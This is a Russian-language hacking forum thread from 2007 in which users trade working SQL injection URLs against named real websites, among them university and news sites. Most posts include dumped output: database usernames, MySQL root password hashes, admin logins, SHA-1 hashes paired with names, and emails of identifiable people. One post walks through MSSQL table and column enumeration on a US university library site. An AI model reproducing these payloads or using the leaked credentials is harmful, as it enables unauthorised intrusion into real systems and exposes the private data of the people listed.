HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 217 из 1602 « Первая < 117167207 213 214 215 216 217 218 219 220 221 2272673177171217 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

Коллекция выпускников;)
  #1  
Старый 14.05.2007, 19:56
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию Коллекция выпускников;)
МИФИ
www.mephi1996.ru

Код:
http://www.mephi1996.ru/news.php?id=-1+union+select+1 ,user(), 3,version(),5,database()/*
user: tyurin@192.168.0.1
version: 4.0.27
database: tyurin

Нашел еще таблицу users, правда похоже права на select нет
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.05.2007, 22:00
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию
Код:
http://www.fof.ru/model.php?id=1+and+1=-1+union+select+1,2,3,null,concat(user,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mysql.user/*
root:51aa86276d773238:66j89
 
Ответить с цитированием

sql_not-finished
  #3  
Старый 14.05.2007, 23:56
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql_not-finished
http://www.progz.ru/
Цитата:
http://www.progz.ru/articles.php?issue=-5+union+select+1,2,3,name,5,6,7,8,9,0+from+users/*
http://ecoportal.ru/
Цитата:
http://ecoportal.ru/conf.php?id_conf=-734+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,1,2,3,4,5,6,7,8,9+fro m+user/*
http://www.prokredo.ru/ mysql 5
Цитата:
http://www.prokredo.ru/collegefaculty.php?id=-16%20union%20select%201,concat_ws(0x3a,id,login,pa ssword,email,name,priv),3,4,5,6,7,8,9,0,1,2,3,4+fr om+kredo_admins+limit+0,1/*
1:mooncat:sql:atarskov@ipsoft.ru:Andrey Tarskov:1
 
Ответить с цитированием

  #4  
Старый 15.05.2007, 07:21
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами: 10374086

Репутация: 1745


По умолчанию
Код:
http://www.acconcept.ru/news/news.php?id=-124+union+select+1,passwd,3,4,membername,6,7,8+from+smf_members/*
Код:
d286012284d40b859c81b773c260ea4d03821c1c:Natali
53f6dbb9fd0bb1e45bdb114ffdeb5167bec445d1:mofa
be1e6dcf9cd70f318bad866c521bc3bb8750889d:Rust
924e378db9cb2016fcb0e813ce6bcc735cc3461b:Fadin Denis
a119561acfc07337fdf05ce695343532c011df58:Alexander.A.Sorokin
52a4a8123268ee014ce79b8e7cb30e4f70918858:SFU
e93b7fe16991598e7bc523fba140adce6ffcb303:KamV
156da86923db93bf020958f39991fbd3b73d490c:Алексей Целищев
c960e53946d1c4ea02c5516c82d20d0e52e6999a:reduhin
824ef2d6d0aaf1eb500fdfb4e5aa7c1673ca7895:Андрей
a3497dbf28bb4a05e88feea07efed24b150fc638:NIKITA
0af4ae9b26fb793e93ca52f9735fe4aae9cb1931:елисеенко
a01249b67aa2af18b39cf1c6513b8f621ecf63c2:Кучкаров
c78840fd55285ff4d96d8f15016fd2de6ef9b717:DRIGGER
660b797b6e8d6ebf4e7e483069b973c5ba564d3a:lzanuda
a13d103e2ddbdfeb417c3843c55d2aca7d7adb4c:синичка
Napalmed -
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
admins/users - еще есть форум, походу самописный...
 
Ответить с цитированием

Mssql
  #5  
Старый 15.05.2007, 15:22
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию Mssql
Во моя первая на MSSQL

eres.geneseo.edu

Код:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+1=@ @version- -
Имя БД: Serials
Имя пользователя: Serials
Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

Находим все таблицы:

Код:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+  1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('VALID_SUBJECT_CODES','dtproperties','eJournals','Item_Subject_Linker','LIBRARY_COMPLETENESS','LIBRARY_INDEX','LIBRARY_LOCATION','LIBRARY_PUBLICATION','LIBRARY_REORDER','LIBRARY_STATUS','LIBRARY_SUBJECT','LIBRARY_TITLE','pJournals','Sfx_e_journals','sJournals','Subject_Codes','sysconstraints','syssegments','VALID_BUILDING_CODES','VALID_COLLECTION_CODES','VALID_INDEX_CODES'))- -
Интересных таблиц не увидел, по этому для примера

Столбцы таблицы eJournals

Код:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+ 1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='eJournals'+AND+COLUMN_NAME+NOT+IN+('ID','Location','Title','Dates','Database','Building','Collection','Volumes_Held','Free'))- -
 
Ответить с цитированием

  #6  
Старый 15.05.2007, 16:43
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию
Код:
http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,password)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193
хеши mysql-5, версия 4.1* =)
 
Ответить с цитированием

  #7  
Старый 15.05.2007, 19:37
lol2006
Познающий
Регистрация: 25.05.2006
Сообщений: 87
С нами: 10506569

Репутация: 44
По умолчанию
Вот
Код:
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!
 
Ответить с цитированием

  #8  
Старый 15.05.2007, 21:17
dadunnnt
Новичок
Регистрация: 16.02.2006
Сообщений: 24
С нами: 10647696

Репутация: 14
По умолчанию
Цитата:
Сообщение от lol2006  
Вот
Код:
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!

Цитата:
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4,DATABASE(),6 ,7,8,9,10,11,12/*
USER() : rossorig_superus@localhost
VERSION() : 4.0.27-log
DATABASE() : rossorig_agbook1
 
Ответить с цитированием

  #9  
Старый 16.05.2007, 05:06
Gorn
Новичок
Регистрация: 25.10.2006
Сообщений: 13
С нами: 10286153

Репутация: 34
По умолчанию
Вот, погуглил немного:
Код:
http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39,60,104,51,62,39),username,0x3a,password,0x3a,email),3,4+from+users
http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users
http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4
http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6
Здесь админку не могу найти. Есть cpanel, тока к нему не подходит =\
Код:
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users&lng=ua
user: admin
pass: repz
Если что-то уже было - ссори за боян
Последний раз редактировалось Gorn; 16.05.2007 в 05:22..
 
Ответить с цитированием

  #10  
Старый 16.05.2007, 08:37
sob@ke
Banned
Регистрация: 30.12.2006
Сообщений: 37
С нами: 10191206

Репутация: 4
По умолчанию
http://www.dancenter.ru/articals.php?id=30'
Последний раз редактировалось sob@ke; 16.05.2007 в 08:39..
 
Ответить с цитированием
Ответ
Страница 217 из 1602 « Первая < 117167207 213 214 215 216 217 218 219 220 221 2272673177171217 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.